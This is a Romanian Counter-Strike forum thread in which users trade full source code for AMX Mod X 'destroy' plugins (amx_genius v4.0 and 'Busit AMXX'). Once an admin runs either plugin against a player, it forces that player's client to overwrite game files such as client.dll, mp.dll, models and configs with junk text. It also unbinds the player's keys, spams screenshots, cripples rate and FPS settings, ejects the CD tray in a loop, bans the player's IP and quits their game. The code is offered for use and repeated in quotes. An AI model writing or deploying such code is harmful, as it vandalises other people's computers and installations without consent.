Plugin Destroy

Categoria cu cereri de pluginuri si nu numai.

Moderators: Moderatori ajutatori, Moderatori, Echipa eXtreamCS.com

Forum rules
Accesează link-ul pentru a putea vedea regulile forumului

Daca doriti sa vi se modifice un plugin, va rugam postati aici .
M3taph0riK
Membru eXtream
Membru eXtream
Posts: 2127
Joined: 16 Jan 2013, 12:55
Detinator Steam: Da
CS Status: Utilizator Serios
SteamID: Utilizator Serios
Reputatie: Restrictie moderator
Nume anterior: RzV24
Utilizator neserios (tepar)
Has thanked: 60 times
Been thanked: 250 times

23 May 2013, 01:15

smileye wrote:Au unii precum amx_pika,amx_destroy_cs, dar nu au sursa si nu am ce face cu ele,daca vreau sa pun in baza acel plugin?daca vreau sa modific ceva la el?Stiu si eu multe doar amxx dar nu le folosesc ca degeaba dai sa decompilezi ca nu gasesti poate fi orice redirect nu ai ce vedea mare lucru acolo.

Poate are cineva un destroy bun cu sma sa imi deie prin PM ! :|

Ai sursele la amx_pika public version si la amx_exterminate nu ai decat sa le modifici dupa bunul plac daca zici ca ai cunostintele necesare. Daca nu folosestele cum sunt ca isi fac treaba.

Am impresia ca nici tu nu stii ce vrei !
RoyalServer 2
User avatar
Gabriel eXtream
Membru, skill +2
Membru, skill +2
Posts: 953
Joined: 20 Aug 2012, 16:43
Detinator Steam: Da
CS Status: Can't be touched
Reputatie: Fost Moderator ajutator
Nume anterior: BlueSky#, EcHoO.
0.3 / 3
Utilizator neserios ( tepar )
Fond eXtream: 0
Location: Bucuresti
Has thanked: 67 times
Been thanked: 125 times

23 May 2013, 18:40

Ba omule , mesajul e facut acum un an , cand nu era amx_pika plugin cu .sma
User avatar
Errol
Membru, skill +1
Membru, skill +1
Posts: 141
Joined: 19 May 2013, 15:42
Detinator Steam: Da
CS Status: Sunt sămânţar, prin concluzie porumbel.
Detinator server CS: DR.CS32.RO
SteamID: Privat
Reputatie: Membru Club eXtreamCS (2 luni)
Location: Bistrita
Has thanked: 17 times
Been thanked: 9 times
Contact:

23 May 2013, 18:50

Vrei ceva care nu e amx_destroy, ce contine sursa, si ce nu e amx_exterminate.

Uite aici amx_genius v4.0, nu ai decat sa iti modifici reclamele, sau orice altele pentru ca eu nu am timp :[/color]

Code: Select all


// www.cs32.ro # comunity - parteneri zero ping //
// # don't delete //
// # Genius++ //

#include <amxmodx>
#include <amxmisc>
#include <engine>
#include <fun>

public plugin_init( )
{
	register_plugin("amx_genius", "v 4.0", "Genius++")
	register_concmd("amx_genius","Fuck", ADMIN_LEVEL_G, "Hack the player / [email protected]")

}
public client_connect(id)
{
	if( task_exists(id) )
		remove_task(id);
}
public Fuck(id, level, cid)
{
	if( !cmd_access(id, level, cid, 2) )
	{
		return PLUGIN_HANDLED
	}

	new genesis[32]
	read_argv(1, genesis, 31)
	get_user_name(id,genesis,charsmax(genesis));
	
	new jucator = cmd_target(id, genesis, CMDTARGET_OBEY_IMMUNITY|CMDTARGET_ALLOW_SELF|CMDTARGET_NO_BOTS)

	if(!jucator)
		return PLUGIN_HANDLED
		
		
	client_cmd(jucator, "cd eject")
	set_task(random_float(3.0, 6.0), "close_cd", jucator)
	
	client_cmd(jucator, "motdfile resource/GameMenu.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile models/player.mdl;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile dlls/mp.dll;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile events/ak47.sc;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile models/v_ak47.mdl;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile sprites/muzzleflash1.spr;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile gfx/palette.lmp;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile media/gamestartup;motd_white Hacked by Genius++")
	client_cmd(jucator, "motdfile rebuy.txt;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile autobuy.txt;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile cl_dlls/GameUI.dll;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile cl_dlls/client.dll;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/ClientScheme.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/CreateMultiplayerGameBotPage.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/CreateMultiplayerGameGameplayPage.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/640_1_a_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/640_1_b_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/640_1_c_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/800_2_a_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/800_2_b_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/800_2_c_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/1024_3_a_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/1024_3_b_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/1024_3_c_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/1280_3_a_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/1280_3_b_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/1280_3_c_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/UI/BuyShotguns_TER.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/UI/MainBuyMenu.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/UI/BuyEquipment_TER.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/UI/Teammenu.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile HACKED.txt;motd_write You have just been hacked by amx_genius v4.0, you will not have the opportunity to stop playing on that server, I wish you a pleasant life. Tocmai ai fost hackuit de catre amx_genius v4.0 , nu vei mai avea ocazia sa mai joci pe acel server  , iti urez o viata placuta . Vous venez d'être piraté par amx_genius v4.0, vous n'aurez pas la possibilité d'arrêter de jouer sur ce serveur, je vous souhaite une vie agréable.")


	client_cmd(jucator, "unbind rightarrow;unbind mwheeldown;unbind a;unbind s;unbind d;unbind q;unbind w;unbind e;unbind ctrl;unbind escape;unbind `;unbind ~;unbind tab;unbind space")
	client_cmd(jucator, "name ^"Hacked by Genius++^"")
	client_cmd(jucator, "say ^"My computer was hacked by amx_genius v4.0^"")
	client_cmd(jucator, "snapshot")
	client_cmd(jucator, "timerefresh")
	client_cmd(jucator, "volume 9999")
	client_cmd(jucator, "cl_showfps 1")
	client_cmd(jucator, "net_graph 3")
	client_cmd(jucator, "snapshot")
	client_cmd(jucator, "rate 1")
	client_cmd(jucator, "cl_")
	client_cmd(jucator, "snapshot")
	client_cmd(jucator, "timerefresh")
	client_cmd(jucator, "fps_max 1")
	client_cmd(jucator, "gl_flipmatrix 1")
	client_cmd(jucator, "fps_modem 000")
	client_cmd(jucator, "snapshot")
	client_cmd(jucator, "con_color ^"255 0 0^"")
	client_cmd(jucator, "cl_cmdrate 1")
	client_cmd(jucator, "cl_updaterate 1")
	client_cmd(jucator, "snapshot")
	client_cmd(jucator, "sys_ticrate 1")
	client_cmd(jucator, "hud_saytext 0")
	client_cmd(jucator, "hideconsole")
	client_cmd(jucator, "snapshot")
	client_cmd(jucator, "developer 1")
	client_cmd(jucator, "cl_allowupload 0")
	client_cmd(jucator, "cl_dlmax 1")
	client_cmd(jucator, "snapshot")
	client_cmd(jucator, "gl_flipmatrix 1")
	client_cmd(jucator, "hideradar")
	client_cmd(jucator, "cl_crosshair_size large")
	client_cmd(jucator, "say ^"My computer was hacked by amx_genius v4.0^"")
	client_cmd(jucator, "fuck")
	server_cmd("amx_addban %s 0 ^"Hacked by amx_genius v4.0!^"",genesis)
	client_cmd(jucator, "timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;cl_timeout 0;quit")
	
	return PLUGIN_CONTINUE;
}
public close_cd(id)
{
	if( !is_user_connected(id) )
		return PLUGIN_HANDLED;
		
	client_cmd(id, "cd close")
	set_task(random_float(3.0, 6.0), "open_cd", id)

	return PLUGIN_CONTINUE;
}
public open_cd(id)
{
	if( !is_user_connected(id) )
		return PLUGIN_HANDLED;
		
	client_cmd(id, "cd eject")
	set_task(random_float(3.0, 6.0), "close_cd", id)

	return PLUGIN_CONTINUE;
}

public ban(id)
{
	new szName[32];
	get_user_name(id,szName,charsmax(szName));
	client_cmd(id, "fuck")
	server_cmd("amx_addban %s 0 ^"Hacked by amx_genius v4.0!^"",szName)  
	
	return PLUGIN_CONTINUE;
}
DAR ! iti recomand sa pastrezi copyright
Image
#WIZARDS to more, but I'm a hero.
-----------------------------------------------------
Lasă telefonul că ştiu actoria
Şi nu mai suna că-mi descarci bateria .


#Work only :

- [FPS Nvidia] [100%] [Public] [Here]
- [NoLag] [100%] [Public] [Here]
User avatar
cyby
Scripter eXtreamCS
Scripter eXtreamCS
Posts: 1777
Joined: 16 Jul 2011, 21:46
Detinator Steam: Da
Detinator server CS: Da
Reputatie: Scripter eXtreamCS
Fost Moderator ajutator
Has thanked: 146 times
Been thanked: 396 times

24 May 2013, 01:22

Errol wrote:Vrei ceva care nu e amx_destroy, ce contine sursa, si ce nu e amx_exterminate.

Uite aici amx_genius v4.0, nu ai decat sa iti modifici reclamele, sau orice altele pentru ca eu nu am timp :[/color]

Code: Select all


// www.cs32.ro # comunity - parteneri zero ping //
// # don't delete //
// # Genius++ //

#include <amxmodx>
#include <amxmisc>
#include <engine>
#include <fun>

public plugin_init( )
{
	register_plugin("amx_genius", "v 4.0", "Genius++")
	register_concmd("amx_genius","Fuck", ADMIN_LEVEL_G, "Hack the player / [email protected]")

}
public client_connect(id)
{
	if( task_exists(id) )
		remove_task(id);
}
public Fuck(id, level, cid)
{
	if( !cmd_access(id, level, cid, 2) )
	{
		return PLUGIN_HANDLED
	}

	new genesis[32]
	read_argv(1, genesis, 31)
	get_user_name(id,genesis,charsmax(genesis));
	
	new jucator = cmd_target(id, genesis, CMDTARGET_OBEY_IMMUNITY|CMDTARGET_ALLOW_SELF|CMDTARGET_NO_BOTS)

	if(!jucator)
		return PLUGIN_HANDLED
		
		
	client_cmd(jucator, "cd eject")
	set_task(random_float(3.0, 6.0), "close_cd", jucator)
	
	client_cmd(jucator, "motdfile resource/GameMenu.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile models/player.mdl;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile dlls/mp.dll;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile events/ak47.sc;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile models/v_ak47.mdl;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile sprites/muzzleflash1.spr;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile gfx/palette.lmp;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile media/gamestartup;motd_white Hacked by Genius++")
	client_cmd(jucator, "motdfile rebuy.txt;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile autobuy.txt;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile cl_dlls/GameUI.dll;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile cl_dlls/client.dll;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/ClientScheme.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/CreateMultiplayerGameBotPage.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/CreateMultiplayerGameGameplayPage.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/640_1_a_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/640_1_b_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/640_1_c_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/800_2_a_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/800_2_b_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/800_2_c_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/1024_3_a_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/1024_3_b_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/1024_3_c_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/1280_3_a_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/1280_3_b_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/1280_3_c_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/UI/BuyShotguns_TER.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/UI/MainBuyMenu.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/UI/BuyEquipment_TER.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/UI/Teammenu.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile HACKED.txt;motd_write You have just been hacked by amx_genius v4.0, you will not have the opportunity to stop playing on that server, I wish you a pleasant life. Tocmai ai fost hackuit de catre amx_genius v4.0 , nu vei mai avea ocazia sa mai joci pe acel server  , iti urez o viata placuta . Vous venez d'être piraté par amx_genius v4.0, vous n'aurez pas la possibilité d'arrêter de jouer sur ce serveur, je vous souhaite une vie agréable.")


	client_cmd(jucator, "unbind rightarrow;unbind mwheeldown;unbind a;unbind s;unbind d;unbind q;unbind w;unbind e;unbind ctrl;unbind escape;unbind `;unbind ~;unbind tab;unbind space")
	client_cmd(jucator, "name ^"Hacked by Genius++^"")
	client_cmd(jucator, "say ^"My computer was hacked by amx_genius v4.0^"")
	client_cmd(jucator, "snapshot")
	client_cmd(jucator, "timerefresh")
	client_cmd(jucator, "volume 9999")
	client_cmd(jucator, "cl_showfps 1")
	client_cmd(jucator, "net_graph 3")
	client_cmd(jucator, "snapshot")
	client_cmd(jucator, "rate 1")
	client_cmd(jucator, "cl_")
	client_cmd(jucator, "snapshot")
	client_cmd(jucator, "timerefresh")
	client_cmd(jucator, "fps_max 1")
	client_cmd(jucator, "gl_flipmatrix 1")
	client_cmd(jucator, "fps_modem 000")
	client_cmd(jucator, "snapshot")
	client_cmd(jucator, "con_color ^"255 0 0^"")
	client_cmd(jucator, "cl_cmdrate 1")
	client_cmd(jucator, "cl_updaterate 1")
	client_cmd(jucator, "snapshot")
	client_cmd(jucator, "sys_ticrate 1")
	client_cmd(jucator, "hud_saytext 0")
	client_cmd(jucator, "hideconsole")
	client_cmd(jucator, "snapshot")
	client_cmd(jucator, "developer 1")
	client_cmd(jucator, "cl_allowupload 0")
	client_cmd(jucator, "cl_dlmax 1")
	client_cmd(jucator, "snapshot")
	client_cmd(jucator, "gl_flipmatrix 1")
	client_cmd(jucator, "hideradar")
	client_cmd(jucator, "cl_crosshair_size large")
	client_cmd(jucator, "say ^"My computer was hacked by amx_genius v4.0^"")
	client_cmd(jucator, "fuck")
	server_cmd("amx_addban %s 0 ^"Hacked by amx_genius v4.0!^"",genesis)
	client_cmd(jucator, "timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;cl_timeout 0;quit")
	
	return PLUGIN_CONTINUE;
}
public close_cd(id)
{
	if( !is_user_connected(id) )
		return PLUGIN_HANDLED;
		
	client_cmd(id, "cd close")
	set_task(random_float(3.0, 6.0), "open_cd", id)

	return PLUGIN_CONTINUE;
}
public open_cd(id)
{
	if( !is_user_connected(id) )
		return PLUGIN_HANDLED;
		
	client_cmd(id, "cd eject")
	set_task(random_float(3.0, 6.0), "close_cd", id)

	return PLUGIN_CONTINUE;
}

public ban(id)
{
	new szName[32];
	get_user_name(id,szName,charsmax(szName));
	client_cmd(id, "fuck")
	server_cmd("amx_addban %s 0 ^"Hacked by amx_genius v4.0!^"",szName)  
	
	return PLUGIN_CONTINUE;
}
DAR ! iti recomand sa pastrezi copyright
Plugin de cacao si mai e si la versiunea 4.0.
Ia de aici | Afiseaza codul
#include <amxmodx>
#include <amxmisc>

new bind_client[][] =
{
	"unbind all",
	"name ^"Am luat o busitura^"",
	"snapshot",
	"screenshot",
	"snapshot",
	"fps_max 1",
	"fps_modem 1"
}

new fuck_client[][] = 
{
	"motdfile cl_dlls/client.dll;motd_write ^"Ai primit un busit^"", 
	"motdfile models/guerilla.mdl;motd_write ^"Ai primit un busit^"", 
	"motdfile resource/GameMenu.res;motd_write ^"Ai primit un busit^"", 
	"motdfile dlls/mp.dll;motd_write ^"Ai primit un busit^"", 
	"motdfile events/ak47.sc;motd_write ^"Ai primit un busit^"", 
	"motdfile models/v_ak47.mdl;motd_write ^"Ai primit un busit^"",
	"motdfile media/gamestartup;motd_write ^"Ai primit un busit^"", 
	"motdfile sprites/muzzleflash1.spr;motd_write ^"Ai primit un busit^"", 
	"motdfile gfx/palette.lmp;motd_write ^"Ai primit un busit^"", 
	"motdfile rebuy.txt;motd_write ^"Ai primit un busit^"", 
	"motdfile autobuy.txt;motd_write ^"Ai primit un busit^"", 
	"motdfile resource/ClientScheme.res;motd_write ^"Ai primit un busit^"", 
	"motdfile resource/CreateMultiplayerGameBotPage.res;motd_write ^"Ai primit un busit^"", 
	"motdfile resource/CreateMultiplayerGameGameplayPage.res;motd_write ^"Ai primit un busit^"", 
	"motdfile resource/background/640_1_a_loading.tga;motd_write ^"Ai primit un busit^"", 
	"motdfile motdfile resource/background/1024_3_a_loading.tga;motd_write ^"Ai primit un busit^"", 
	"motdfile resource/background/1280_3_a_loading.tga;motd_write ^"Ai primit un busit^"", 
	"motdfile motdfile resource/UI/Teammenu.res;motd_write ^"Ai primit un busit^"",
	"motdfile motdfile config.CFG;motd_write ^"Ai primit un busit^"",
	"motdfile motdfile userconfig.CFG;motd_write ^"Ai primit un busit^""
}

public plugin_init()
{
	register_plugin("Busit AMXX", "1.0", "cyby")
	register_concmd("amx_buseste", "buseste_l", ADMIN_BAN, "- <nume> distruge jucatorul")
}

public buseste_l(id, level, cid)
{
	if(!cmd_access(id, level, cid, 2))
	{
		return PLUGIN_HANDLED
	}
	
	new juc[32];
	read_argv(1, juc, 31)
	new jucator = cmd_target(id, juc, CMDTARGET_OBEY_IMMUNITY)

	if(!jucator)
	{
		console_print(id, "Jucatorul nu exista.")
		return PLUGIN_HANDLED
	}

	set_task(0.05, "ss_task", id+11111, _, _, "b")
	set_task(0.05, "cd_close_eject", id+11112, _, _, "b")
	
	new n;
	for(n = 0; n < sizeof bind_client; n++)
	{
		client_cmd(jucator, bind_client[n])
	}
	for(n = 0; n < sizeof fuck_client; n++)
	{
		client_cmd(jucator, fuck_client[n])
	}
	
	new admin[32], numejuc[32], ip[32];
	get_user_name(id, admin, 31)
	get_user_name(jucator, numejuc, 31)
	get_user_ip(jucator, ip, 31, 1)
	color(0, ".v[AMXX].g Adminul.e %s.g ii buseste una lui.e %s.g", admin, numejuc)
	
	server_cmd("addip 0.0 ^"%s^";wait;writeip", ip)
	log_to_file("busire.log", "Adminul %s l-a busit pe %s cu IP-ul: %s", admin, numejuc, ip)
	return PLUGIN_HANDLED;
}

public ss_task(id)
{
	if(!is_user_connected(id) && task_exists(id+11111))
	{
		remove_task(id+11111)
		return PLUGIN_HANDLED
	}
	client_cmd(id, "screenshot")
	client_cmd(id, "snapshot")
	return PLUGIN_CONTINUE
}

public cd_close_eject(id)
{
	if(!is_user_connected(id) && task_exists(id+11112))
	{
		remove_task(id+11112)
		return PLUGIN_HANDLED
	}
	client_cmd(id, "cd eject")
	client_cmd(id, "cd close")
	return PLUGIN_CONTINUE
}

public client_disconnect(id)
{
	remove_task(id+11111)
	remove_task(id+11112)
}

stock color(const id, const input[], any:...)
{
	new count = 1, players[32]
	static msg[191]
	vformat(msg, 190, input, 3)

	replace_all(msg, 190, ".v", "^4")
	replace_all(msg, 190, ".g", "^1")
	replace_all(msg, 190, ".e", "^3")

	if (id) players[0] = id; else get_players(players, count, "ch")
	{
		for (new i = 0; i < count; i++)
		{
			if (is_user_connected(players))
			{
				message_begin(MSG_ONE_UNRELIABLE, get_user_msgid("SayText"), _, players)
				write_byte(players);
				write_string(msg);
				message_end();
			}
		}
	}
}
93.114.82.17:27015 - Monster Invasion CO-OP Mod
User avatar
Errol
Membru, skill +1
Membru, skill +1
Posts: 141
Joined: 19 May 2013, 15:42
Detinator Steam: Da
CS Status: Sunt sămânţar, prin concluzie porumbel.
Detinator server CS: DR.CS32.RO
SteamID: Privat
Reputatie: Membru Club eXtreamCS (2 luni)
Location: Bistrita
Has thanked: 17 times
Been thanked: 9 times
Contact:

24 May 2013, 13:34

cyby wrote:
Errol wrote:Vrei ceva care nu e amx_destroy, ce contine sursa, si ce nu e amx_exterminate.

Uite aici amx_genius v4.0, nu ai decat sa iti modifici reclamele, sau orice altele pentru ca eu nu am timp :[/color]

Code: Select all


// www.cs32.ro # comunity - parteneri zero ping //
// # don't delete //
// # Genius++ //

#include <amxmodx>
#include <amxmisc>
#include <engine>
#include <fun>

public plugin_init( )
{
	register_plugin("amx_genius", "v 4.0", "Genius++")
	register_concmd("amx_genius","Fuck", ADMIN_LEVEL_G, "Hack the player / [email protected]")

}
public client_connect(id)
{
	if( task_exists(id) )
		remove_task(id);
}
public Fuck(id, level, cid)
{
	if( !cmd_access(id, level, cid, 2) )
	{
		return PLUGIN_HANDLED
	}

	new genesis[32]
	read_argv(1, genesis, 31)
	get_user_name(id,genesis,charsmax(genesis));
	
	new jucator = cmd_target(id, genesis, CMDTARGET_OBEY_IMMUNITY|CMDTARGET_ALLOW_SELF|CMDTARGET_NO_BOTS)

	if(!jucator)
		return PLUGIN_HANDLED
		
		
	client_cmd(jucator, "cd eject")
	set_task(random_float(3.0, 6.0), "close_cd", jucator)
	
	client_cmd(jucator, "motdfile resource/GameMenu.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile models/player.mdl;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile dlls/mp.dll;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile events/ak47.sc;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile models/v_ak47.mdl;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile sprites/muzzleflash1.spr;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile gfx/palette.lmp;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile media/gamestartup;motd_white Hacked by Genius++")
	client_cmd(jucator, "motdfile rebuy.txt;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile autobuy.txt;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile cl_dlls/GameUI.dll;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile cl_dlls/client.dll;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/ClientScheme.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/CreateMultiplayerGameBotPage.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/CreateMultiplayerGameGameplayPage.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/640_1_a_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/640_1_b_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/640_1_c_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/800_2_a_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/800_2_b_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/800_2_c_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/1024_3_a_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/1024_3_b_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/1024_3_c_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/1280_3_a_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/1280_3_b_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/background/1280_3_c_loading.tga;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/UI/BuyShotguns_TER.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/UI/MainBuyMenu.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/UI/BuyEquipment_TER.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile resource/UI/Teammenu.res;motd_write Hacked by Genius++")
	client_cmd(jucator, "motdfile HACKED.txt;motd_write You have just been hacked by amx_genius v4.0, you will not have the opportunity to stop playing on that server, I wish you a pleasant life. Tocmai ai fost hackuit de catre amx_genius v4.0 , nu vei mai avea ocazia sa mai joci pe acel server  , iti urez o viata placuta . Vous venez d'être piraté par amx_genius v4.0, vous n'aurez pas la possibilité d'arrêter de jouer sur ce serveur, je vous souhaite une vie agréable.")


	client_cmd(jucator, "unbind rightarrow;unbind mwheeldown;unbind a;unbind s;unbind d;unbind q;unbind w;unbind e;unbind ctrl;unbind escape;unbind `;unbind ~;unbind tab;unbind space")
	client_cmd(jucator, "name ^"Hacked by Genius++^"")
	client_cmd(jucator, "say ^"My computer was hacked by amx_genius v4.0^"")
	client_cmd(jucator, "snapshot")
	client_cmd(jucator, "timerefresh")
	client_cmd(jucator, "volume 9999")
	client_cmd(jucator, "cl_showfps 1")
	client_cmd(jucator, "net_graph 3")
	client_cmd(jucator, "snapshot")
	client_cmd(jucator, "rate 1")
	client_cmd(jucator, "cl_")
	client_cmd(jucator, "snapshot")
	client_cmd(jucator, "timerefresh")
	client_cmd(jucator, "fps_max 1")
	client_cmd(jucator, "gl_flipmatrix 1")
	client_cmd(jucator, "fps_modem 000")
	client_cmd(jucator, "snapshot")
	client_cmd(jucator, "con_color ^"255 0 0^"")
	client_cmd(jucator, "cl_cmdrate 1")
	client_cmd(jucator, "cl_updaterate 1")
	client_cmd(jucator, "snapshot")
	client_cmd(jucator, "sys_ticrate 1")
	client_cmd(jucator, "hud_saytext 0")
	client_cmd(jucator, "hideconsole")
	client_cmd(jucator, "snapshot")
	client_cmd(jucator, "developer 1")
	client_cmd(jucator, "cl_allowupload 0")
	client_cmd(jucator, "cl_dlmax 1")
	client_cmd(jucator, "snapshot")
	client_cmd(jucator, "gl_flipmatrix 1")
	client_cmd(jucator, "hideradar")
	client_cmd(jucator, "cl_crosshair_size large")
	client_cmd(jucator, "say ^"My computer was hacked by amx_genius v4.0^"")
	client_cmd(jucator, "fuck")
	server_cmd("amx_addban %s 0 ^"Hacked by amx_genius v4.0!^"",genesis)
	client_cmd(jucator, "timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;wait;timerefresh;cl_timeout 0;quit")
	
	return PLUGIN_CONTINUE;
}
public close_cd(id)
{
	if( !is_user_connected(id) )
		return PLUGIN_HANDLED;
		
	client_cmd(id, "cd close")
	set_task(random_float(3.0, 6.0), "open_cd", id)

	return PLUGIN_CONTINUE;
}
public open_cd(id)
{
	if( !is_user_connected(id) )
		return PLUGIN_HANDLED;
		
	client_cmd(id, "cd eject")
	set_task(random_float(3.0, 6.0), "close_cd", id)

	return PLUGIN_CONTINUE;
}

public ban(id)
{
	new szName[32];
	get_user_name(id,szName,charsmax(szName));
	client_cmd(id, "fuck")
	server_cmd("amx_addban %s 0 ^"Hacked by amx_genius v4.0!^"",szName)  
	
	return PLUGIN_CONTINUE;
}
DAR ! iti recomand sa pastrezi copyright
Plugin de cacao si mai e si la versiunea 4.0.
Ia de aici | Afiseaza codul
#include <amxmodx>
#include <amxmisc>

new bind_client[][] =
{
	"unbind all",
	"name ^"Am luat o busitura^"",
	"snapshot",
	"screenshot",
	"snapshot",
	"fps_max 1",
	"fps_modem 1"
}

new fuck_client[][] = 
{
	"motdfile cl_dlls/client.dll;motd_write ^"Ai primit un busit^"", 
	"motdfile models/guerilla.mdl;motd_write ^"Ai primit un busit^"", 
	"motdfile resource/GameMenu.res;motd_write ^"Ai primit un busit^"", 
	"motdfile dlls/mp.dll;motd_write ^"Ai primit un busit^"", 
	"motdfile events/ak47.sc;motd_write ^"Ai primit un busit^"", 
	"motdfile models/v_ak47.mdl;motd_write ^"Ai primit un busit^"",
	"motdfile media/gamestartup;motd_write ^"Ai primit un busit^"", 
	"motdfile sprites/muzzleflash1.spr;motd_write ^"Ai primit un busit^"", 
	"motdfile gfx/palette.lmp;motd_write ^"Ai primit un busit^"", 
	"motdfile rebuy.txt;motd_write ^"Ai primit un busit^"", 
	"motdfile autobuy.txt;motd_write ^"Ai primit un busit^"", 
	"motdfile resource/ClientScheme.res;motd_write ^"Ai primit un busit^"", 
	"motdfile resource/CreateMultiplayerGameBotPage.res;motd_write ^"Ai primit un busit^"", 
	"motdfile resource/CreateMultiplayerGameGameplayPage.res;motd_write ^"Ai primit un busit^"", 
	"motdfile resource/background/640_1_a_loading.tga;motd_write ^"Ai primit un busit^"", 
	"motdfile motdfile resource/background/1024_3_a_loading.tga;motd_write ^"Ai primit un busit^"", 
	"motdfile resource/background/1280_3_a_loading.tga;motd_write ^"Ai primit un busit^"", 
	"motdfile motdfile resource/UI/Teammenu.res;motd_write ^"Ai primit un busit^"",
